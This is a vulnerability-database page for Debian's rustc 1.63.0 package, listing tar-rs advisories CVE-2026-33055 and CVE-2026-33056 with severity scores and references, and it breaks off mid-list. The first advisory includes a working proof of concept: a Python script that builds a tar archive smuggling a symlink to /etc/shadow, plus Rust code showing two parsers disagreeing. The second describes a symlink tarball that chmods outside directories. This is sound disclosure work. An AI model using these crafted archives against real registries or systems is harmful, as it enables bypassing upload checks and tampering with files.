Lookup for vulnerable packages by Package URL.

Purlpkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
Typedeb
Namespacedebian
Namerustc
Version1.63.0+dfsg1-2
Qualifiers
Subpath
Is_vulnerabletrue
Next_non_vulnerable_version1.70.0+dfsg1-9
Latest_non_vulnerable_version1.86.0+dfsg1-1~bpo13+2
Affected_by_vulnerabilities
0
url VCID-ehdy-7aak-r3bt
vulnerability_id VCID-ehdy-7aak-r3bt
summary
tar-rs incorrectly ignores PAX size headers if header size is nonzero
### Summary

As part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.

However, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.

The problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.

In this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.


### Details

https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600
https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344

### PoC

(originally posted by https://github.com/xokdvium)


> I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:

It seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.

https://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600
https://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344

```python
#!/usr/bin/env python3
B = 512


def pad(d):
    r = len(d) % B
    return d + b"\0" * (B - r) if r else d


def hdr(name, size, typ=b"0", link=b""):
    h = bytearray(B)
    h[0 : len(name)] = name
    h[100:107] = b"0000644"
    h[108:115] = h[116:123] = b"0001000"
    h[124:135] = f"{size:011o}".encode()
    h[136:147] = b"00000000000"
    h[148:156] = b"        "
    h[156:157] = typ
    if link:
        h[157 : 157 + len(link)] = link
    h[257:263] = b"ustar\x00"
    h[263:265] = b"00"
    h[148:155] = f"{sum(h):06o}\x00".encode()
    return bytes(h)


INFLATED = 2048
pax_rec = b"13 size=2048\n"

ar = bytearray()
ar += hdr(b"./PaxHeaders/regular", len(pax_rec), typ=b"x")
ar += pad(pax_rec)

content = b"regular\n"
ar += hdr(b"regular.txt", len(content))
mark = len(ar)
ar += pad(content)

ar += hdr(b"smuggled", 0, typ=b"2", link=b"/etc/shadow")
ar += b"\0" * B * 2

used = len(ar) - mark
if used < INFLATED:
    ar += b"\0" * (((INFLATED - used + B - 1) // B) * B)
ar += b"\0" * B * 2

open("smuggle.tar", "wb").write(bytes(ar))
```

`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).

```rust
use std::fs;
use std::path::PathBuf;

fn sync_parse(data: &[u8]) {
    println!("tar:");
    let mut ar = tar::Archive::new(data);
    for e in ar.entries().unwrap() {
        let e = e.unwrap();
        let path = e.path().unwrap().to_path_buf();
        let kind = e.header().entry_type();
        let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
        match link {
            Some(l) => println!("  {:20} {:?} -> {}", path.display(), kind, l.display()),
            None => println!("  {:20} {:?}", path.display(), kind),
        }
    }
    println!();
}

async fn async_parse(data: Vec<u8>) {
    println!("astral-tokio-tar:");
    let mut ar = tokio_tar::Archive::new(data.as_slice());
    let mut entries = ar.entries().unwrap();
    while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {
        let e = e.unwrap();
        let path = e.path().unwrap().to_path_buf();
        let kind = e.header().entry_type();
        let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());
        match link {
            Some(l) => println!("  {:20} {:?} -> {}", path.display(), kind, l.display()),
            None => println!("  {:20} {:?}", path.display(), kind),
        }
    }
    println!();
}

#[tokio::main]
async fn main() {
    let path = std::env::args().nth(1).unwrap_or("smuggle.tar".into());
    let data = fs::read(&path).unwrap();
    sync_parse(&data);
    async_parse(data).await;
}
```

```
tar:
  regular.txt          Regular
  smuggled             Symlink -> /etc/shadow

astral-tokio-tar:
  regular.txt          Regular
```

### Impact

This can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33055
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01418
published_at 2026-04-09T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01406
published_at 2026-04-04T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01412
published_at 2026-04-07T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01417
published_at 2026-04-08T12:55:00Z
4
value 0.00011
scoring_system epss
scoring_elements 0.01396
published_at 2026-04-16T12:55:00Z
5
value 0.00011
scoring_system epss
scoring_elements 0.01404
published_at 2026-04-13T12:55:00Z
6
value 0.00011
scoring_system epss
scoring_elements 0.01411
published_at 2026-04-11T12:55:00Z
7
value 0.00011
scoring_system epss
scoring_elements 0.01409
published_at 2026-04-18T12:55:00Z
8
value 0.00011
scoring_system epss
scoring_elements 0.01403
published_at 2026-04-12T12:55:00Z
9
value 0.00012
scoring_system epss
scoring_elements 0.01893
published_at 2026-04-29T12:55:00Z
10
value 0.00012
scoring_system epss
scoring_elements 0.01847
published_at 2026-04-26T12:55:00Z
11
value 0.00012
scoring_system epss
scoring_elements 0.01851
published_at 2026-04-24T12:55:00Z
12
value 0.00012
scoring_system epss
scoring_elements 0.01861
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33055
1
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055
2
reference_url https://github.com/alexcrichton/tar-rs
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/alexcrichton/tar-rs
3
reference_url https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/
url https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946
4
reference_url https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/
url https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33055
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33055
6
reference_url https://rustsec.org/advisories/RUSTSEC-2026-0068.html
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://rustsec.org/advisories/RUSTSEC-2026-0068.html
7
reference_url https://www.cve.org/CVERecord?id=CVE-2025-62518
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/
url https://www.cve.org/CVERecord?id=CVE-2025-62518
8
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480
reference_id 1131480
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225
reference_id 1135225
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225
10
reference_url https://github.com/advisories/GHSA-gchp-q4r4-x4ff
reference_id GHSA-gchp-q4r4-x4ff
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gchp-q4r4-x4ff
fixed_packages
0
url pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9
purl pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9
1
url pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2
purl pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2
aliases CVE-2026-33055, GHSA-gchp-q4r4-x4ff
risk_score 3.6
exploitability 0.5
weighted_severity 7.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ehdy-7aak-r3bt
1
url VCID-qj1y-b8m1-hyfm
vulnerability_id VCID-qj1y-b8m1-hyfm
summary
tar-rs `unpack_in` can chmod arbitrary directories by following symlinks
## Summary

When unpacking a tar archive, the `tar` crate's `unpack_dir` function uses `fs::metadata()` to check whether a path that already exists is a directory. Because `fs::metadata()` follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory — and subsequently apply `chmod` to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root.

## Reproducer

A malicious tarball contains two entries: (1) a symlink `foo` pointing to an arbitrary external directory, and (2) a directory entry `foo/.` (or just `foo`). When unpacked, `create_dir("foo")` fails with `EEXIST` because the symlink is already on disk. The `fs::metadata()` check then follows the symlink, sees a directory at the target, and allows processing to continue. The directory entry's mode bits are then applied via `chmod`, which also follows the symlink — modifying the permissions of the external target directory.

## Fix 

The fix is very simple, we now use `fs::symlink_metadata()` in `unpack_dir`, so symlinks are detected and rejected rather than followed.

## Credit

This issue was reported by @xokdvium - thank you!
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json
reference_id
reference_type
scores
0
value 4.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33056.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33056
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01448
published_at 2026-04-09T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01422
published_at 2026-04-16T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01431
published_at 2026-04-12T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.0144
published_at 2026-04-11T12:55:00Z
4
value 0.00011
scoring_system epss
scoring_elements 0.01446
published_at 2026-04-08T12:55:00Z
5
value 0.00011
scoring_system epss
scoring_elements 0.01441
published_at 2026-04-07T12:55:00Z
6
value 0.00011
scoring_system epss
scoring_elements 0.01436
published_at 2026-04-18T12:55:00Z
7
value 0.00011
scoring_system epss
scoring_elements 0.01432
published_at 2026-04-13T12:55:00Z
8
value 0.00012
scoring_system epss
scoring_elements 0.01946
published_at 2026-04-29T12:55:00Z
9
value 0.00012
scoring_system epss
scoring_elements 0.01916
published_at 2026-04-24T12:55:00Z
10
value 0.00012
scoring_system epss
scoring_elements 0.01922
published_at 2026-04-21T12:55:00Z
11
value 0.00012
scoring_system epss
scoring_elements 0.01912
published_at 2026-04-26T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33056
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33056
3
reference_url https://github.com/alexcrichton/tar-rs
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/alexcrichton/tar-rs
4
reference_url https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/
url https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446
5
reference_url https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T12:59:15Z/
url https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33056
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-33056
7
reference_url https://rustsec.org/advisories/RUSTSEC-2026-0067.html
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
1
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://rustsec.org/advisories/RUSTSEC-2026-0067.html
8
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481
reference_id 1131481
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131481
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2449490
reference_id 2449490
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2449490
10
reference_url https://github.com/advisories/GHSA-j4xf-2g29-59ph
reference_id GHSA-j4xf-2g29-59ph
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j4xf-2g29-59ph
11
reference_url https://usn.ubuntu.com/8138-1/
reference_id USN-8138-1
reference_type
scores
url https://usn.ubuntu.com/8138-1/
12
reference_url https://usn.ubuntu.com/8138-2/
reference_id USN-8138-2
reference_type
scores
url https://usn.ubuntu.com/8138-2/
13
reference_url https://usn.ubuntu.com/8139-1/
reference_id USN-8139-1
reference_type
scores
url https://usn.ubuntu.com/8139-1/
14
reference_url https://usn.ubuntu.com/8168-1/
reference_id USN-8168-1
reference_type
scores
url https://usn.ubuntu.com/8168-1/
15
reference_url https://usn.ubuntu.com/8168-2/
reference_id USN-8168-2
reference_type
scores
url https://usn.ubuntu.com/8168-2/
fixed_packages
0
url pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9
purl pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9
1
url pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2
purl pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2
aliases CVE-2026-33056, GHSA-j4xf-2g29-59ph
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qj1y-b8m1-hyfm
Fixing_vulnerabilities
0
url VCID-4khp-kevq-xff5
vulnerability_id VCID-4khp-kevq-xff5
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28875.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-28875
reference_id
reference_type
scores
0
value 0.00416
scoring_system epss
scoring_elements 0.61571
published_at 2026-04-01T12:55:00Z
1
value 0.00416
scoring_system epss
scoring_elements 0.61733
published_at 2026-04-29T12:55:00Z
2
value 0.00416
scoring_system epss
scoring_elements 0.61724
published_at 2026-04-24T12:55:00Z
3
value 0.00416
scoring_system epss
scoring_elements 0.61741
published_at 2026-04-26T12:55:00Z
4
value 0.00416
scoring_system epss
scoring_elements 0.61645
published_at 2026-04-02T12:55:00Z
5
value 0.00416
scoring_system epss
scoring_elements 0.61676
published_at 2026-04-04T12:55:00Z
6
value 0.00416
scoring_system epss
scoring_elements 0.61647
published_at 2026-04-07T12:55:00Z
7
value 0.00416
scoring_system epss
scoring_elements 0.61695
published_at 2026-04-08T12:55:00Z
8
value 0.00416
scoring_system epss
scoring_elements 0.61711
published_at 2026-04-09T12:55:00Z
9
value 0.00416
scoring_system epss
scoring_elements 0.61732
published_at 2026-04-11T12:55:00Z
10
value 0.00416
scoring_system epss
scoring_elements 0.6172
published_at 2026-04-12T12:55:00Z
11
value 0.00416
scoring_system epss
scoring_elements 0.617
published_at 2026-04-13T12:55:00Z
12
value 0.00416
scoring_system epss
scoring_elements 0.61742
published_at 2026-04-16T12:55:00Z
13
value 0.00416
scoring_system epss
scoring_elements 0.61747
published_at 2026-04-18T12:55:00Z
14
value 0.00416
scoring_system epss
scoring_elements 0.6173
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-28875
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28875
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949194
reference_id 1949194
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949194
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1803
reference_id AVG-1803
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1803
7
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
8
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
9
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-28875
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4khp-kevq-xff5
1
url VCID-69zd-gcvx-fuhr
vulnerability_id VCID-69zd-gcvx-fuhr
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-42574.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-42574
reference_id
reference_type
scores
0
value 0.24988
scoring_system epss
scoring_elements 0.96175
published_at 2026-04-16T12:55:00Z
1
value 0.24988
scoring_system epss
scoring_elements 0.96167
published_at 2026-04-13T12:55:00Z
2
value 0.24988
scoring_system epss
scoring_elements 0.96165
published_at 2026-04-12T12:55:00Z
3
value 0.24988
scoring_system epss
scoring_elements 0.9618
published_at 2026-04-18T12:55:00Z
4
value 0.25471
scoring_system epss
scoring_elements 0.96236
published_at 2026-04-29T12:55:00Z
5
value 0.25471
scoring_system epss
scoring_elements 0.96181
published_at 2026-04-01T12:55:00Z
6
value 0.25471
scoring_system epss
scoring_elements 0.96189
published_at 2026-04-02T12:55:00Z
7
value 0.25471
scoring_system epss
scoring_elements 0.96197
published_at 2026-04-04T12:55:00Z
8
value 0.25471
scoring_system epss
scoring_elements 0.962
published_at 2026-04-07T12:55:00Z
9
value 0.25471
scoring_system epss
scoring_elements 0.9621
published_at 2026-04-08T12:55:00Z
10
value 0.25471
scoring_system epss
scoring_elements 0.96213
published_at 2026-04-09T12:55:00Z
11
value 0.25471
scoring_system epss
scoring_elements 0.96232
published_at 2026-04-21T12:55:00Z
12
value 0.25471
scoring_system epss
scoring_elements 0.96233
published_at 2026-04-24T12:55:00Z
13
value 0.25471
scoring_system epss
scoring_elements 0.96234
published_at 2026-04-26T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-42574
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42574
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url http://www.openwall.com/lists/oss-security/2021/11/01/1
reference_id 1
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url http://www.openwall.com/lists/oss-security/2021/11/01/1
5
reference_url http://www.openwall.com/lists/oss-security/2021/11/02/10
reference_id 10
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url http://www.openwall.com/lists/oss-security/2021/11/02/10
6
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2005819
reference_id 2005819
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2005819
7
reference_url http://www.openwall.com/lists/oss-security/2021/11/01/4
reference_id 4
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url http://www.openwall.com/lists/oss-security/2021/11/01/4
8
reference_url http://www.openwall.com/lists/oss-security/2021/11/01/5
reference_id 5
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url http://www.openwall.com/lists/oss-security/2021/11/01/5
9
reference_url http://www.openwall.com/lists/oss-security/2021/11/01/6
reference_id 6
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url http://www.openwall.com/lists/oss-security/2021/11/01/6
10
reference_url https://www.kb.cert.org/vuls/id/999008
reference_id 999008
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.kb.cert.org/vuls/id/999008
11
reference_url https://security.archlinux.org/AVG-2506
reference_id AVG-2506
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-2506
12
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://security.gentoo.org/glsa/202210-09
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/
reference_id IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IH2RG5YTR6ZZOLUV3EUPZEIJR7XHJLVD/
14
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/
reference_id LQNTFF24ROHLVPLUOEISBN3F7QM27L4U
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LQNTFF24ROHLVPLUOEISBN3F7QM27L4U/
15
